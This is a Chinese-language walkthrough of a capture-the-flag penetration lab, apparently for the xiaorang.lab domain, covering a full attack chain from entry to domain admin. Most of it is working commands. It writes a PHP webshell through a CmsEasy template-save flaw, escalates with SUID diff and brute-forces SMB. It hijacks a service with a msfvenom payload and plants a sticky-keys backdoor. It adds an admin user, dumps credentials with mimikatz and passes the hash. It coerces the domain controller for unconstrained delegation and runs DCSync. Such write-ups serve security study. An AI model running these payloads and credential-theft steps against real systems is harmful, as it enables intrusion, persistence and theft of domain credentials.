現用fscan掃一下入口機
發現是cmseasy,在/admin路由處可以登入,弱密碼admin123456
這裡存在CVE漏洞,寫個馬進去
get:
/index.php?case=template&act=save&admin_dir=admin&site=default
post:
sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php @eval($_POST[1]);?>
回顯OK說明上傳成功
蟻劍連結,反彈shell到vps
檢視一下suid位
find / -user root -perm -4000 -print 2>/dev/null
結果如下
/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
使用diff提權
diff --line-format=%L /dev/null /home/flag/flag01.txt
flag:flag{d9a0b461-21df-4a64-9ad9-0e650adfd950}
配置nps代理,傳個fscan掃內網
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.45:135 open
172.22.4.7:139 open
172.22.4.7:135 open
172.22.4.19:135 open
[*] NetInfo:
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetInfo:
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetBios: 172.22.4.45 XIAORANG\WIN19
[*] NetBios: 172.22.4.7 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle: http://172.22.4.36 code:200 len:68069 title:中文網頁標題
[*] WebTitle: http://172.22.4.45 code:200 len:703 title:IIS Windows Server
總感覺fscan掃的太慢了...
上面的flag提示要打win19去爆破密碼
proxychains crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19
得到密碼
WIN19\Adrian
babygirl1
先用kali登一下去改密碼
proxychains rdesktop 172.22.4.45
改完還是回到windows下去登(kali太慢了)
在其中找到了一個html檔案,內容包含如下部分
意識是這個ModifiablePath是普通使用者可寫的.因此可以進行登錄檔提權
首先使用msf生成一個木馬來執行我們的shift.bat
msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > evil.exe
然後新建一個shift.bat如下
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
依次執行如下命令
## 修改登錄檔
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\evil.exe" /f
## 重啟服務
sc start gupdate
鎖定使用者,連按5下shift,彈出shell
建立一個新的使用者lbz,新增到管理員組,然後進行遠端連線
net user lbz lbz041130 /add
net localgroup administrators lbz /add
拿到了第二個flag
flag:flag{c015ba18-f75e-4c0b-8b8e-5e82b9a48205}
上傳mimikatz,去抓取本地雜湊
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
得到了域使用者win19$的NTLM
d776bd558e56bbc4f47eed38dc9e4d05
使用mimikatz進行雜湊橫傳.
mimikatz "privilege::debug" "sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:d776bd558e56bbc4f47eed38dc9e4d05"
彈出了域使用者的管理員終端
上傳一個SharpHound去抓域資訊
SharpHound.exe -c all
發現這個WIN19 和 DC01 都存在非約束性委託
上傳Rubeus監聽TGT
Rubeus.exe monitor /interval:1 /filteruser:DC01$
使用dfscoerce.py去誘導DC01向win19$發起請求
proxychains python3 dfscoerce.py -u "WIN19$" -hashes :d776bd558e56bbc4f47eed38dc9e4d05 -d xiaorang.lab win19 172.22.4.7
成功截獲DC01的TGT
將得到的base64放入base64.txt中,使用如下命令解碼
certutil -f -decode base64.txt DC.kirbi
此時有了Domain Admain許可權,可以打一個DCsync
mimikatz.exe "kerberos::purge" "kerberos::ptt DC.kirbi" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
得到了Administractor的NTLM雜湊4889f6553239ace1f7c47fa2c619c252
雜湊橫傳獲得其他兩個機器上的flag
proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
flag:flag{20e2ee96-53b2-4f36-b09e-f3d0744186f1}
proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"
flag:flag{57502dcf-63db-48b4-93e7-adafa2dd20aa}
共用時1小時24分,是目前最快的一次.這個靶場學到了很多東西,同時清晰了很多概念...會看bloodhound了.第一次進行非約束委派攻擊.